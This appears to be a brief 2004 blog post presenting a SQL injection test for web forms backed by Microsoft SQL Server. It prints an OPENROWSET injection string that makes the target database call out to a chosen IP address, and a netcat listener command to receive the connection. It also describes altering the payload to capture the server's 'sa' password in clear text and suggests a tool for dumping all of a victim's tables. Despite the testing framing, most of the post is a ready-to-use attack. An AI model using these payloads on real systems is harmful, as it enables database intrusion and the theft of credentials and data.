Pen test, SQL Injection

Udgivet den januar 7, 2004 af Brian Lund Klint 
Here's the string you can drop in web form inputs to see if they're vulnerable to
SQL injection (on Microsoft SQL server anyway):

'; select * from OPENROWSET('SQLOLEDB','192.168.0.1';;,'select @@version')--

To verify results, replace the IP address w/ that of the machine you're testing from,
and use netcat (attached) to listen on port 1433 with the following syntax:

nc -vvv -l -p 1433

If the test is successful, you should see a connection and some garbage characters
in the netcat window.  This type of attack is particularly heinous to customers
running Microsoft SQL Server 7/2000.  If you replace the 'select @@version' with
another command, you can cause the remote database to try and connect using its
own 'sa' user and password in clear text and capture it with a sniffer.

IF you want to get REALLY tricky, download 'data thief v1.0' and dump all of their
tables in a handy GUI format.

http://www.spidynamics.com/whitepapers/Blind_SQLInjection.pdf
Dette indlæg blev udgivet i Exploits, Knowledge Base, Security. Bogmærk permalinket.

Skriv et svar